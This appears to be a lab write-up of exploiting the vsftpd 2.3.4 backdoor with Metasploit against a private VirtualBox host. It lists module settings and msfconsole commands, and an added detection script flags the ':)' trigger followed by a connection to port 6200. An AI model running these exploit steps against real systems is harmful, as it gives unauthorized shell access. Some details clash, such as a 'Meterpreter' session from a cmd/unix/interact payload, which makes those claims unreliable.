Objective: To execute a remote command execution (RCE) exploit against a backdoored FTP service to gain unauthorized administrative access to the target host.
1. Exploitation Strategy
The target was identified as running vsftpd 2.3.4, which is susceptible to CVE-2011-2523. This vulnerability allows an attacker to trigger a shell by sending a specific sequence (a smiley face, `:)`) in the FTP username. I utilized the Metasploit Framework (MSF) to automate the delivery and management of this exploit.
2. Technical Execution & Configuration
A critical part of this activity was the precise configuration of the Exploit Payload. I mapped the “Local Host” (Attacker) and “Remote Host” (Victim) to ensure the reverse connection bypassed potential networking errors.
| Module Variable | Value | Purpose |
|---|---|---|
| Exploit Module | unix/ftp/vsftpd_234_backdoor | The specific code targeting the vsftpd backdoor. |
| RHOSTS | 192.168.56.101 | The target infrastructure IP address. |
| LHOST | 192.168.56.1 | The attacker’s IP on the vboxnet0 interface. |
| Payload | cmd/unix/interact | The method of interacting with the spawned shell. |
3. Attack Lifecycle
- Module Selection: Initialized `msfconsole` and loaded the `vsftpd_234_backdoor` module.
- Environmental Validation: Ran `show options` to confirm all parameters (IPs and Ports) were correctly set to avoid “noisy” or failed attempts.
- Payload Delivery: Executed the `exploit` command. The framework automatically handled the “handshake” and identified the triggered shell on Port 6200.
- Session Establishment: Successfully opened Meterpreter Session 1, providing a high-level command-and-control (C2) interface.
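The two observables described above (a `:)` in the FTP username, then a connection to port 6200 on the same host) are enough to build a detection. The following is an added example, not part of the original write-up: it correlates both events from a sensor log. The log format, the sample events and the 30-second window are assumptions constructed for illustration.

```python
import re
from datetime import datetime, timedelta

# Constructed sample events in a hypothetical sensor format (not real tool output).
SAMPLE_EVENTS = """\
2024-05-01T10:00:00 FTP 192.168.56.1 -> 192.168.56.101:21 USER anonymous
2024-05-01T10:02:10 FTP 192.168.56.1 -> 192.168.56.101:21 USER backup:)
2024-05-01T10:02:12 CONN 192.168.56.1 -> 192.168.56.101:6200
2024-05-01T10:30:00 CONN 192.168.56.7 -> 192.168.56.101:6200
2024-05-01T11:00:00 FTP 192.168.56.9 -> 192.168.56.101:21 USER smile:)
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<kind>FTP|CONN) (?P<src>\S+) -> (?P<dst>[\d.]+):(?P<port>\d+)"
    r"(?: USER (?P<user>.*))?$"
)
BACKDOOR_PORT = 6200            # port the write-up reports the shell on
WINDOW = timedelta(seconds=30)  # assumed correlation window


def detect(log_text, window=WINDOW):
    """Return one alert per ':)' username; severity is upgraded to 'trigger+shell'
    when the same destination sees a port-6200 connection within the window."""
    triggers = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # ignore lines that do not parse
        ts = datetime.fromisoformat(m["ts"])
        if m["kind"] == "FTP" and m["user"] and ":)" in m["user"]:
            triggers.append({"time": ts, "src": m["src"], "dst": m["dst"],
                             "user": m["user"], "severity": "trigger-only"})
        elif m["kind"] == "CONN" and int(m["port"]) == BACKDOOR_PORT:
            for t in triggers:
                if t["dst"] == m["dst"] and timedelta(0) <= ts - t["time"] <= window:
                    t["severity"] = "trigger+shell"
    return triggers


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert["time"].isoformat(), alert["dst"], alert["user"], alert["severity"])
```

A `trigger-only` alert is still worth triage: it means the string was sent, and the absence of a port-6200 connection may only mean the service was not the backdoored build or the port was filtered.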
4. Key Commands Used
- `msfconsole`: To launch the penetration testing framework.
- `use exploit/unix/ftp/vsftpd_234_backdoor`: Loading the specific vulnerability module.
- `set RHOSTS 192.168.56.101`: Aiming the exploit at the target.
- `exploit`: Running the attack and establishing the connection.


5. Professional Impact
This activity demonstrates the ability to translate “Research” into “Action.” By successfully managing a Metasploit session, I proved proficiency in Remote Access Tooling. Furthermore, the transition from an unauthenticated FTP request to a full system shell highlights the catastrophic impact that unpatched, backdoored software can have on an organization’s security posture.
